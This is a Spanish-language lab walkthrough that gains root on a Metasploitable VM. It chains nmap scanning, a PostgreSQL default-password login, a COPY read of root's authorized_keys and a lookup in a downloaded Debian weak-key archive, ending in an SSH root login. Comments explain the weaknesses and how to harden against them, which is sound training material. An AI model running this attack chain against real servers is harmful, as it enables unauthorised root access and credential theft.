# Metasploitable (postgres + openssl)

Introducción

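Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python): el generador de números aleatorios de los paquetes OpenSSL afectados de Debian era predecible, por lo que las claves SSH generadas con ellos pertenecen a un conjunto pequeño y enumerable. Si una clave pública autorizada en el servidor proviene de ese conjunto, su clave privada correspondiente aparece en un archivo de claves precalculadas; por eso toda clave generada en un sistema afectado debe regenerarse y eliminarse de los ficheros `authorized_keys`.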

Ejecución
# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
-- Lab transcript: these statements run in the psql session opened above, logged in as
-- 'postgres' with the default password the login scanner reported.

-- Scratch table with a single text column to hold the imported file, one row per line.
create table sshkey (input text);
-- COPY ... FROM '<path>' reads a file on the database server with the OS rights of the
-- server process. PostgreSQL limits it to superusers (newer releases: also members of
-- pg_read_server_files), so the default 'postgres' password is what makes this reachable.
-- NOTE(review): the read succeeding implies the server process can read root's
-- authorized_keys on this lab VM; presumably a deliberately weak setup. Hardening points:
-- change the default password, restrict remote access to port 5432 (pg_hba.conf /
-- listen_addresses), and run the server under an account with no access to /root.
copy sshkey from '/root/.ssh/authorized_keys';
-- Show the imported rows; the output below is the public key authorized for root.
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)
# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root
